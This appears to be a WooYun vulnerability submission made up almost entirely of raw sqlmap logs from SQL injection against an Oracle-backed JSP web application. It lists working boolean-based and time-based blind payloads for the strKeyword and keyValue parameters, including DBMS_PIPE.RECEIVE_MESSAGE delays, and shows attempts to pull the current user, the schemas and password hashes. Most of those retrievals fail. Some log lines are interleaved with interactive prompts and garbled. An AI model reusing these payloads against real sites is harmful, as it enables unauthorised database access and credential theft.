WooYun.org

---
Place: GET
Parameter: strKeyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: strColId=1304409675750001&strKeyword=%' AND 1234=1234 AND '%'='&strLinkColId=&view_type=0
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: strColId=1304409675750001&strKeyword=%' AND 8103=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(100)||CHR(90)||CHR(70),5) AND '%'='&strLinkColId=&view_type=0
---
[21:14:24] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:14:24] [INFO] fetching current user
[21:14:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:14:24] [INFO] retrieved: 
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] 
[21:14:27] [WARNING] reflective value(s) found and filtering out
[21:14:30] [WARNING] time-based comparison requires larger statistical model, please wait.......................
[21:14:39] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[21:14:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user:	None
[21:14:42] [INFO] fetching current database
[21:14:42] [INFO] retrieved: 
[21:14:46] [INFO] retrieved: 
[21:14:49] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):	None
[21:14:49] [INFO] testing if current user is DBA
current user is DBA:    False
[21:14:49] [INFO] fetching database users password hashes
[21:14:49] [INFO] fetching database users
[21:14:49] [INFO] fetching number of database users
[21:14:49] [INFO] retrieved: 
[21:14:51] [INFO] retrieved: 
[21:14:52] [CRITICAL] unable to retrieve the number of database users
[21:14:52] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:14:52] [INFO] fetching database (schema) names
[21:14:52] [INFO] fetching number of databases
[21:14:52] [INFO] retrieved: 
[21:14:54] [INFO] retrieved: 
[21:14:56] [ERROR] unable to retrieve the number of databases
[21:14:56] [INFO] falling back to current database
[21:14:56] [INFO] fetching current database
[21:14:56] [INFO] retrieved: 
[21:14:59] [INFO] retrieved: 
[21:15:04] [CRITICAL] unable to retrieve the database names

---
Place: POST
Parameter: keyValue
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: frmSch=1&keyName=strSource&keyValue=-1%' AND 9316=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(68)||CHR(119)||CHR(68),5) AND '%'='&PageSizeIndex=2&strColId=1304409675750001&strColKind=&strKeyword=&strLinkColId=
---
[21:47:30] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:47:30] [INFO] fetching current user
[21:47:30] [INFO] resumed: \x05\x05
current user:    ''
[21:47:30] [INFO] fetching current database
[21:47:30] [INFO] resumed: \x05\x05
[21:47:30] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    ''
[21:47:30] [INFO] testing if current user is DBA
current user is DBA:    False
[21:47:30] [INFO] fetching database users password hashes
[21:47:30] [INFO] fetching database users
[21:47:30] [INFO] fetching number of database users
[21:47:30] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] 
..............................
[21:47:47] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[21:47:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[21:47:49] [INFO] retrieved:   
[21:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:47:49] [CRITICAL] unable to retrieve the number of database users
[21:47:49] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:47:49] [INFO] fetching database (schema) names
[21:47:49] [INFO] fetching number of databases
[21:47:51] [INFO] retrieved:   
[21:47:51] [ERROR] unable to retrieve the number of databases
[21:47:51] [INFO] falling back to current database
[21:47:51] [INFO] fetching current database
available databases [1]:
[*]

---
Place: POST
Parameter: keyValue
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: frmSch=1&keyName=strMasTitle&keyValue=-1%' AND 9830=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(120)||CHR(109)||CHR(98),5) AND '%'='&PageSizeIndex=2&strColId=13739392833284153
---
[21:56:55] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:56:55] [INFO] fetching current user
[21:56:55] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] 
..............................
[21:57:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[21:57:11] [INFO] retrieved:   
[21:57:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user:	None
[21:57:11] [INFO] fetching current database
[21:57:12] [INFO] retrieved:   
[21:57:12] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):	None
[21:57:12] [INFO] testing if current user is DBA
current user is DBA:    False
[21:57:12] [INFO] fetching database users password hashes
[21:57:12] [INFO] fetching database users
[21:57:12] [INFO] fetching number of database users
[21:57:13] [INFO] retrieved:   
[21:57:13] [CRITICAL] unable to retrieve the number of database users
[21:57:13] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:57:13] [INFO] fetching database (schema) names
[21:57:13] [INFO] fetching number of databases
[21:57:14] [INFO] retrieved:   
[21:57:14] [ERROR] unable to retrieve the number of databases
[21:57:14] [INFO] falling back to current database
[21:57:14] [INFO] fetching current database
[21:57:16] [INFO] retrieved:   
[21:57:16] [CRITICAL] unable to retrieve the database names